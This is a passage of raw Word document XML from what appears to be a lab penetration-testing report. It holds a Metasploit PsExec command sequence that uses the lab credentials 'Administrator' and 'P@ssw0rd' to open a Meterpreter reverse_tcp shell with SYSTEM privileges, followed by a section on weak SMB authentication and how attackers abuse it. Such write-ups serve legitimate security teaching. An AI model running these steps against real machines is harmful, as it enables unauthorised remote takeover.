                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="210BE346" w14:textId="77777777" w:rsidR="0086222C"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789" name="Rectangle 2789"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4986846" y="2784602"/>
                            <a:ext cx="41147" cy="247427"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7EAA4745" w14:textId="77777777" w:rsidR="0086222C"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794" name="Picture 2794"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId42"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="14288" y="354045"/>
                            <a:ext cx="4927600" cy="2530475"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="2795" name="Shape 2795"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="339821"/>
                            <a:ext cx="4956175" cy="2559050"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="4956175" h="2559050">
                                <a:moveTo>
                                  <a:pt x="0" y="2559050"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4956175" y="2559050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="495617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59" style="width:395.101pt;height:233.908pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="50177,29706">
                <v:rect id="Rectangle 2785" style="position:absolute;width:932;height:1850;left:6622;top:374;"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2786" style="position:absolute;width:563;height:2260;left:7323;top:51;"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787" style="position:absolute;width:18607;height:2474;left:8908;top:0;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:cs="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:ascii="Calibri"/>
                            <w:w w:val="107"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Password:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:cs="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:ascii="Calibri"/>
                            <w:spacing w:val="-5"/>
                            <w:w w:val="107"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:cs="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:ascii="Calibri"/>
                            <w:w w:val="107"/>
                          </w:rPr>
                          <w:t xml:space="preserve">P@ssw0rd</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2788" style="position:absolute;width:411;height:2474;left:22917;top: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rect id="Rectangle 2789" style="position:absolute;width:411;height:2474;left:49868;top:27846;"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2794" style="position:absolute;width:49276;height:25304;left:142;top:3540;" filled="f">
                  <v:imagedata r:id="rId43"/>
                </v:shape>
                <v:shape id="Shape 2795" style="position:absolute;width:49561;height:25590;left:0;top:3398;" coordsize="4956175,2559050" path="m0,2559050l4956175,2559050l4956175,0l0,0x">
                  <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#ff0000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="240F9BF0" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="188" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DE01AF" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F35298" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="409" w:lineRule="auto"/>
        <w:ind w:right="4731" w:hanging="240"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Exploiting with Metasploit (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">) Steps: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B457A8" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="37" w:line="269" w:lineRule="auto"/>
        <w:ind w:left="1075" w:right="65"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Launch Metasploit: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E93719D" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="269" w:lineRule="auto"/>
        <w:ind w:left="1810" w:right="65"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797A8CF8" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="269" w:lineRule="auto"/>
        <w:ind w:left="1075" w:right="65"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Select exploit: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7EFD74" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="75" w:line="269" w:lineRule="auto"/>
        <w:ind w:right="1459" w:firstLine="1260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Set options: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCE329E" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1459" w:firstLine="1260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">set RHOST 192.168.135.129 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7078AB64" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1459" w:firstLine="1260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMBUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Administrator </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60540CEB" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:right="1459" w:firstLine="1260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMBPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> P@ssw0rd </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13807B4D" w14:textId="0A51D124" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:right="1459" w:firstLine="1260"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setPAYLOAD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4306E9FA" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1459" w:firstLine="1260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">set LHOST 192.168.135.128 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4AEDB7" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="22" w:line="454" w:lineRule="auto"/>
        <w:ind w:right="1459" w:firstLine="1260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048E73C7" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:right="1459" w:firstLine="1260"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Meterpreter session opened </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FC5B27" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:right="1459" w:firstLine="1260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Access granted with SYSTEM-level privileges </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5741DA68" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="1459" w:firstLine="1260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload executed successfully </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1464AF8F" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="214" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="298235F0" wp14:editId="035BFBB4">
                <wp:extent cx="5810453" cy="3421659"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="20262" name="Group 20262"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5810453" cy="3421659"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5810453" cy="3421659"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2894" name="Rectangle 2894"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5772353" y="2980156"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0D0B7DA5"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95" name="Rectangle 2895"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3252953"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0176C0F4" w14:textId="77777777" w:rsidR="0086222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99" name="Picture 2899"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId44"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="18745" y="9525"/>
                            <a:ext cx="5731510" cy="3081655"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="2900" name="Shape 2900"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="9220" y="0"/>
                            <a:ext cx="5750560" cy="3100705"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5750560" h="3100705">
                                <a:moveTo>
                                  <a:pt x="0" y="3100705"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5750560" y="3100705"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5750560" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="190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62" style="width:457.516pt;height:269.422pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="58104,34216">
                <v:rect id="Rectangle 2894" style="position:absolute;width:506;height:2243;left:57723;top:29801;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2895" style="position:absolute;width:506;height:2243;left:0;top:32529;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 2899" style="position:absolute;width:57315;height:30816;left:187;top:95;" filled="f">
                  <v:imagedata r:id="rId45"/>
                </v:shape>
                <v:shape id="Shape 2900" style="position:absolute;width:57505;height:31007;left:92;top:0;" coordsize="5750560,3100705" path="m0,3100705l5750560,3100705l5750560,0l0,0x">
                  <v:stroke weight="1.5pt" endcap="flat" joinstyle="round" on="true" color="#ff0000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AFCA60" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F3C560" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="-5" w:right="1351"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc23331"/>
      <w:r>
        <w:t xml:space="preserve">2.4.2 Selected Critical Vulnerability: Weak SMB Authentication </w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="69E7E17E" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="177" w:line="402" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="1351"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Why does it exist? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC29515" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="288"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Easily forgettable or default passwords are left as is by users. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DE3F90" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="291"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SMBv1 and related protocols are enabled. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773957BE" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="167" w:line="394" w:lineRule="auto"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>A flimsy defence against brute-force attack which is combined with sparse account lockout policies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE80B75" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="346" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">How can an attacker exploit it? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0C7605" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="188" w:line="392" w:lineRule="auto"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trying to gang up login logon credentials automatically with the aid of such shells as Hydra. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B189B05" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="290"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use pilfered credentials to work locally via remote media like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FFFCBD" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="269"/>
        <w:ind w:right="147" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reaching total administrative control using Metasploit. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8FA40B" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Real-World Example: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D951B7A" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="175" w:line="377" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Organisations might receive ransomware attacks from criminals, such as Ryuk and Conti, who take advantage of poor password management and reusing credentials that begin to penetrate systems via SMB vulnerabilities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4BFD3A" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="119" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3E4EBE" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F4761"/>
